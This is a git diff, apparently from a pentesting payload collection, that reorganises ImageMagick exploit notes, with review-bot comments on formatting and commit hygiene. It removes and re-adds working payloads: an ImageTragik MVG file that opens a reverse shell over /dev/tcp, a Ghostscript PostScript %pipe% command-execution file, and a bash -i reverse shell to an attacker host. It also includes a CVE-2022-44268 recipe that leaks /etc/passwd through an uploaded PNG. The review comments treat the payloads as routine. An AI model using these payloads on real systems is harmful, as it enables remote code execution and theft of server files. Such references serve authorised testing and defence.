ImageMagick Typo
@ -4431,3 +4431,4 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae
* [Getting in the Zone: dumping Active Directory DNS using adidnsdump - Dirk-jan Mollema](https://blog.fox-it.com/2019/04/25/getting-in-the-zone-dumping-active-directory-dns-using-adidnsdump/)
* [Getting in the Zone: dumping Active Directory DNS using adidnsdump - Dirk-jan Mollema](https://blog.fox-it.com/2019/04/25/getting-in-the-zone-dumping-active-directory-dns-using-adidnsdump/)
* [S4U2self abuse - TheHackerRecipes](https://www.thehacker.recipes/ad/movement/kerberos/delegations/s4u2self-abuse)
* [S4U2self abuse - TheHackerRecipes](https://www.thehacker.recipes/ad/movement/kerberos/delegations/s4u2self-abuse)
* [Abusing Kerberos S4U2self for local privilege escalation - cfalta](https://cyberstoph.org/posts/2021/06/abusing-kerberos-s4u2self-for-local-privilege-escalation/)
* [Abusing Kerberos S4U2self for local privilege escalation - cfalta](https://cyberstoph.org/posts/2021/06/abusing-kerberos-s4u2self-for-local-privilege-escalation/)
* [External Trusts Are Evil - 14 March 2023 - Charlie Clark (@exploitph)](https://exploit.ph/external-trusts-are-evil.html)
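Review bot: the added reference line `* [External Trusts Are Evil - 14 March 2023 - Charlie Clark (@exploitph)](...)` is unrelated to the commit subject "ImageMagick Typo" and belongs in its own commit so the Active Directory methodology history stays attributable; the entry itself follows the surrounding list's `* [Title - Author](URL)` convention, so no change to the line is needed.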
@ -1,38 +0,0 @@
# Image Tragik 1 & 2
## Exploit v1
Simple reverse shell
```powershell
push graphic-context
encoding "UTF-8"
viewbox 0 0 1 1
affine 1 0 0 1 0 0
push graphic-context
image Over 0,0 1,1 '|/bin/sh -i > /dev/tcp/ip/80 0<&1 2>&1'
pop graphic-context
pop graphic-context
```
## Exploit v2
Simple `id` payload
```powershell
%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%id) currentdevice putdeviceprops
```
then use `convert shellexec.jpeg whatever.gif`
## Thanks to
* [openwall.com/lists/oss-security/2018/08/21/2 by Tavis Ormandy](http://openwall.com/lists/oss-security/2018/08/21/2)
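Review bot: the whole 38-line file is deleted here and re-added under `Upload Insecure Files/Picture ImageMagick/README.md` in the next hunk, so git records a delete plus an add rather than a rename; staging it as a rename (`git mv` of the old folder before editing) would keep blame and history and shrink the diff to the lines that actually change, namely the heading text and the new CVE-2022-44268 section.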
52
Upload Insecure Files/Picture ImageMagick/README.md
Normal file
@ -0,0 +1,52 @@
# ImageMagick Exploits
## ImageTragik Exploit v1
Simple reverse shell
```powershell
push graphic-context
encoding "UTF-8"
viewbox 0 0 1 1
affine 1 0 0 1 0 0
push graphic-context
image Over 0,0 1,1 '|/bin/sh -i > /dev/tcp/ip/80 0<&1 2>&1'
pop graphic-context
pop graphic-context
```
## ImageTragik Exploit v2
Simple `id` payload
```powershell
%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%id) currentdevice putdeviceprops
```
then use `convert shellexec.jpeg whatever.gif`
## CVE-2022-44268
Information Disclosure: embedded the content of an arbitrary remote file
* Generate the payload
```ps1
apt-get install pngcrush imagemagick exiftool exiv2 -y
pngcrush -text a "profile" "/etc/passwd" exploit.png
```
* Trigger the exploit by uploading the file. The backend might use something like `convert pngout.png pngconverted.png`
* Download the converted picture and inspect its content with: `identify -verbose pngconverted.png`
* Convert the exfiltrated data: `python3 -c 'print(bytes.fromhex("HEX_FROM_FILE").decode("utf-8"))'`
## Thanks to
* [openwall.com/lists/oss-security/2018/08/21/2 by Tavis Ormandy](http://openwall.com/lists/oss-security/2018/08/21/2)
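Review bot: the code fences in the new file are mis-tagged: `powershell` wraps an ImageMagick MVG script (`push graphic-context ...`) and a PostScript file (`%!PS ...`), and `ps1` wraps an apt-get/pngcrush shell snippet; tag them `text` (or the actual language) and `bash` so the highlighting does not suggest the wrong interpreter. Two documentation points in the CVE-2022-44268 section: "embedded the content of an arbitrary remote file" should say local file, because the path given to pngcrush (`/etc/passwd`) is read from the server that processes the uploaded image, not from a remote host; and the "Generate the payload" step should mention that pngcrush, given a single input file, writes its output to `pngout.png` by default, which is where the `convert pngout.png pngconverted.png` filename in the next step comes from.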
@ -11,7 +11,7 @@
* [Filename vulnerabilities](#filename-vulnerabilities)
* [Filename vulnerabilities](#filename-vulnerabilities)
* [Picture compression](#picture-compression-)
* [Picture compression](#picture-compression-)
* [Configuration Files](#configuration-files)
* [Configuration Files](#configuration-files)
* [CVE - Image Tragik](#cve---image-tragik)
* [CVE - ImageMagick](#cve---imagemagick)
* [CVE - FFMpeg](#cve---ffmpeg)
* [CVE - FFMpeg](#cve---ffmpeg)
* [ZIP Archive](#zip-archive)
* [ZIP Archive](#zip-archive)
* [Jetty RCE](#jetty-rce)
* [Jetty RCE](#jetty-rce)
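Review bot: the renamed table-of-contents entry `* [CVE - ImageMagick](#cve---imagemagick)` matches GitHub's slug for the `### CVE - ImageMagick` heading changed further down in this commit (lowercased, spaces and the dash each become a hyphen), so the anchor stays valid; the other entries in the hunk are unchanged context and need nothing.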
@ -161,10 +161,11 @@ Alternatively you may be able to upload a JSON file with a custom scripts, try t
}
}
```
```
### CVE - Image Tragik
### CVE - ImageMagick
Upload this content with an image extension to exploit the vulnerability (ImageMagick , 7.0.1-1)
If the backend is using ImageMagick to resize/convert user images, you can try to exploit well-known vulnerabilities such as ImageTragik.
* ImageTragik example: Upload this content with an image extension to exploit the vulnerability (ImageMagick , 7.0.1-1)
```powershell
```powershell
push graphic-context
push graphic-context
viewbox 0 0 640 480
viewbox 0 0 640 480
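Review bot: the version qualifier in the new bullet, `(ImageMagick , 7.0.1-1)`, is carried over from the old sentence with its stray space and still does not say whether 7.0.1-1 is affected or the release that fixed the issue; write it as `ImageMagick < 7.0.1-1` (7.0.1-1 is the release that shipped the ImageTragik fix) so readers do not test the wrong versions. The new intro sentence ("If the backend is using ImageMagick to resize/convert user images...") reads well; the `powershell` fence around the MVG payload below it is still misleading and could be `text`.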
@ -172,7 +173,7 @@ fill 'url(https://127.0.0.1/test.jpg"|bash -i >& /dev/tcp/attacker-ip/attacker-p
pop graphic-context
pop graphic-context
```
```
More payload in the folder `Picture Image Magik`
More payloads in the folder `Picture ImageMagick`
### CVE - FFMpeg
### CVE - FFMpeg
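Review bot: the corrected sentence `More payloads in the folder \`Picture ImageMagick\`` names the folder as plain inline code; since this commit creates `Upload Insecure Files/Picture ImageMagick/README.md` next to this README, a relative markdown link to that folder would make the reference clickable and would break visibly if the folder is renamed again. The pluralisation fix ("payloads") and the corrected spelling of the folder name are consistent with the new path.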